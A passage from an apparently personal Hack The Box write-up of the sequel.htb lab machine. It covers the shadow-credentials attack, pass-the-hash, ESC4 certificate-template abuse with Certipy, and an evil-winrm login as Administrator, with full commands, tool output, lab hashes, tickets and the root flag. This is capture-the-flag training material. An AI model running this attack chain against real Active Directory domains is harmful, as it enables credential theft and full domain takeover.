nBRjU7mIQ6x4ufvs3VhqInJx6lmGZjhSgbqGJSQTQl6WwdJuhAWGMOdeUevGCrrx1MkzFvjuA1ePq4IaIacTzLmpVmUbeRBOcHVEmTm0piMHryE6JyVtd5rfxJWCtaXpHbYcMM815iUBz4RE+V+d2WUZ0tzOhBTvBfcBQa3JMnc4z/C9dz1AhE6FbRi2hHYd22GletTs3t1/vlH5aFkqqbtO2uf/qNccRipLR0KO273CrHlPdps/EilmF9qpqQvgNxIp+csaqHlV3DvBYdlNyi5I7YTL4GNdMmGH8qqQBB7HKAUC6un9chkSyweDhBKftzHdjjhvl4dmzy9AKousGRLBag0tCz9BuW+PRDJSNTLtphENW6+8cuOMMP1QmEnz78TouqjV/oGK+jZxbT+IueASXIjB3WBUsl/yCVoFp4dwmt4fUNXJEoBCpKW0xBg59QqC24aJsmZEnCFU9Mm7x0D1+Dcags9MY+XUZ1ay7XC5ucQ0Krnjj1J3iC4xCy6aBFqVec4HfylkJq4YmbdCuvExbTaKzyLSOIMd97aw4q3tZfhWRMQBezDwrlV/3htNHc2+LGF6w9yUNLlCcnaTK7ADnokGT+886KU4mkbq6yrXUsKEA7dDNSvxFNjF+fimIrUbfJtjK+fvsoD9uNlb59CNpkWqjbMArg0mzkVfy9BoO9wi2VgIoXeST8T7/FkiKR+NUDhQ85vlRcWInLDIZbh08PQfGlpb+mL6oLNCY2Rj80dWeE/NtbyHGVXqlTrggAPAx9IBG72KQWESP0m5VgHQhZQzc0uwGcshMmhQkWl3D/R9IVHe3dwWM8qDw/JHruySok1gl2+b1yJBJ7wZYYhPfvgq5mB6hIn610PfG+iDOe3QS5jQBPDrZb40TPMF96PLJhYUXCe+PyjJHOSlKuEOfkKOSoahsoU7HgeQCU1JtdFwZOuuSASpOK6IZ8B2B+dMDswHzAHBgUrDgMCGgQUpFUYG/5pGpBByxbdApddPwYV3xIEFMq424HXOS5CTqRBJzIFDzldelfhAgIH0A== /password:"JSVbHTvuGtaRz03f" /domain:sequel.htb /dc:DC01.sequel.htb /getcredentials /show

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=ca_svc
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\ca_svc'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGQjCCBj6gAwIBBaEDAgEWooIFXzCCBVthggVXMIIFU6ADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
      AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUbMIIFF6ADAgESoQMCAQKiggUJBIIFBYkhmYC1u2g9
      ZvO20ZySRbhJBWO/uRDyewdiY40aKLnz0nv/u5Qsr/1QY5qxbuaJY0arbDjzt5csJWEP1m+mtFOVcUk+
      wbyOxjewmQDJ+YzWyLFpfFrL3D40EQC/jwLWJ6ohk6+55k3sOX8IWT953knVC/xaCg2jz6zxzw7Etun/
      AgJvHXpxFipRYY1VzFr9F5jzQUnySBTgtjSbg1cwHW/awtEKQjDnF3XW6HRFTYi4xawQ99cvByOdEd20
      qLZHCu7jdeb+M3ykR9kbgicwx79hFsUPNWAzcLaTWe1CwCSFhuWF/GEGaOTIr1Srej+MAVRxXMKGpNNB
      +9636/+d0pQCEk9OHw648AjGnCuhTSofBdpjK8Up7lYUdpYARA+MIFszlUbWJOUzkSvvXA7LRoVyKVsv
      p6iHZBmAESYFPDTaU3SDykun0XxKq50Ddcjkf/Nc8BsSosCLuc/3YP/nvOiIOu8TDI9ZsENjrNx7Xjtx
      VAoj8rHihHQOVzGPKW0gchpmb8LI0ataa1Qmp8a8+PEAVmsQd/MsLdE7RYn/bhexgFAirLO1/qE+atAb
      olPY6qHXyQ6CcrnnZ3GDyzkkdC4I/w2lXr6O+vf4kEWZOs/eERiLv0eVBAPUY1TuCnwbg995GLQUcdAc
      OSmASi5NhoPkTLkvzkBloHrfgR1RumGXxk+kv08Tiy6wKhC207Ryeqztl1U9WX6Ze35Ri2vZ9kbL+dPH
      IZIdqYFw/g3WWZ1BKubZL7NREavTU7rAHV6MXV4mrRMqBODkKRXzPTMI+BCy2UtjuQJ4emVF3F9STSc0
      yUBz4+23WbIPKj8gC+LCfQO/LThmrf7zrmpABw4zKu6Mvq7fpSiKmlYwXxib+Y/MEVF8lP9J+bEA0RIU
      DBMPBB+AePePCHfMgF+CFtvE13CIZFptVkM1BTvUWZHxE5zp7Mcx35wBXU3OZJOAYj/dzRJiQl53YFAH
      HtoCJOZqYAkTlgfNMfgLlYfUcRsgUjveB8eewDDk5BtP1ETftb/lngOJw04A8Pf4Rt2MJbsOcxokViQQ
      ViuGOMwhTe0WD3OjC7LkOIIrZycQK+KDI3fD7EVjf36P+hysu5PUFWRIF2lDWuCt0wOaFiRGkGx/ZO5v
      emGTyeIfz8vq7u8YZntmca7+ygL4PkgI1QFcw6WMufjDIVH/FEluO1UK53zH2vWgzQzZ6pV6kJCLa3VT
      Ai8tNaQJuMjo4eSgLr4u+dIIlcCAhnkrK0QJ7cd8AVc//LHd0nTGfeJE0jBn641+rI0WI0U1ub8NwfyI
      EVkFZ1M2MALVAlh+IXy4vnpvdIp2h5pdLb9dB1Zt6fX9v6lCPRKJSf6vtbbOnDNff4qGd8p+9LAa58Em
      3byczkJBGkyWpwcmJ2UchJwZc56c9SqPoPz3zES7G6Pb4D4kt5tjaVVWqJ/cP7rCxKcQcFTiiUGiv56F
      NsaQhWf54b+lAqRSuBH4FnSrhgGgNUA4TPoq3/vICOpw0RC3hnFECCsDZVLiIKTJOHI+V4knuPodWsGE
      +j999Qii1sDyxR+7/OO5jqSSEbWiUUxEFnG9x9nQFJi0m5Q9HfQ6MzanVoVHQKR1GW9LcGjbNJ1naqnE
      QRD+/gp9SdmBspnDHecIP4rPpbdsLFKbfUWR/7b8HIb00YsL6+e3ZJCl/X9Beu8dMAGP3OSl13iW8346
      Fm1EQchEvXn/RTxXQ5EZqAmjgc4wgcugAwIBAKKBwwSBwH2BvTCBuqCBtzCBtDCBsaAbMBmgAwIBF6ES
      BBCWjz/GXALJ7+1QaZfFZsTIoQwbClNFUVVFTC5IVEKiEzARoAMCAQGhCjAIGwZjYV9zdmOjBwMFAEDh
      AAClERgPMjAyNTAxMTEyMjQxMjFaphEYDzIwMjUwMTEyMDg0MTIxWqcRGA8yMDI1MDExODIyNDEyMVqo
      DBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  ca_svc
  UserRealm                :  SEQUEL.HTB
  StartTime                :  1/11/2025 2:41:21 PM
  EndTime                  :  1/12/2025 12:41:21 AM
  RenewTill                :  1/18/2025 2:41:21 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  lo8/xlwCye/tUGmXxWbEyA==
  ASREP (key)              :  97A5B84E9E715B3F8C0C2EAB6E56DBCB

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 3B181B914E7A9D5508EA1E20BC2B7FCE

From the future, typo in the domain name failed the whole shadow credentials attack from outside.... sooo.... yeah. sequel, not sequal !

└─$ certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account ca_svc -target sequel.htb -dc-ip 10.129.164.144
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '105debfa-0570-7a0f-d577-cfb215902484'
[*] Adding Key Credential with device ID '105debfa-0570-7a0f-d577-cfb215902484' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '105debfa-0570-7a0f-d577-cfb215902484' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

Success

└─$ netexec smb 10.129.221.78 -u 'ca_svc' -H '3B181B914E7A9D5508EA1E20BC2B7FCE'
SMB         10.129.221.78   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.129.221.78   445    DC01             [+] sequel.htb\ca_svc:3B181B914E7A9D5508EA1E20BC2B7FCE

Note: Do not reset password with any commands, just shadow credentials attack the original password which will not change through the box.

Privilege Escalation (Administrator)

ESC4

└─$ certipy-ad find -vulnerable -u 'ca_svc@sequal.htb' -hashes '3B181B914E7A9D5508EA1E20BC2B7FCE' -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: Could not connect: [Errno 113] No route to host
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via RRP: [Errno Connection error (10.129.228.253:445)] [Errno 113] No route to host
[!] Failed to get CA configuration for 'sequel-DC01-CA'
[!] Got error while trying to check for web enrollment: [Errno 113] No route to host
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions

https://github.com/ly4k/Certipy?tab=readme-ov-file#esc4 https://www.thehacker.recipes/ad/movement/adcs/access-controls#certificate-templates-esc4

certipy-ad template -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication -save-old
certipy-ad template -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication
certipy-ad req -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -ca sequel-DC01-CA -target dc01.sequal.htb -template DunderMifflinAuthentication -upn administrator@sequal.htb -timeout 1000
certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain sequal.htb

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with UPN 'administrator@sequal.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequal.htb
[*] Trying to get TGT...
[-] Wrong domain name specified 'sequal.htb'
[-] Verify that the domain 'sequal.htb' matches the certificate UPN: administrator@sequal.htb

auth fails for some reason again due to kerberos...

Skill issue 💀 It should have been sequel, not sequal....................................................

└─$ certipy-ad template -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication -save-old
certipy-ad template -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication
certipy-ad req -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -ca sequel-DC01-CA -target dc01.sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -timeout 100
certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain sequel.htb

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

Root.txt

└─$ evil-winrm -i sequel.htb -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
f343878d88bc4ccec915441b7a779c6d

PreviousDog NextHaze

Last updated 7 months ago

hashtagRecon

hashtagSMB (139/445)

hashtagMSSQL (1433)

hashtagReverse Shell

hashtagPrivilege Escalation (ryan)

hashtagUser.txt

hashtagPrivilege Escalation (ca_svc)

hashtagPrivilege Escalation (Administrator)

hashtagESC4

hashtagRoot.txt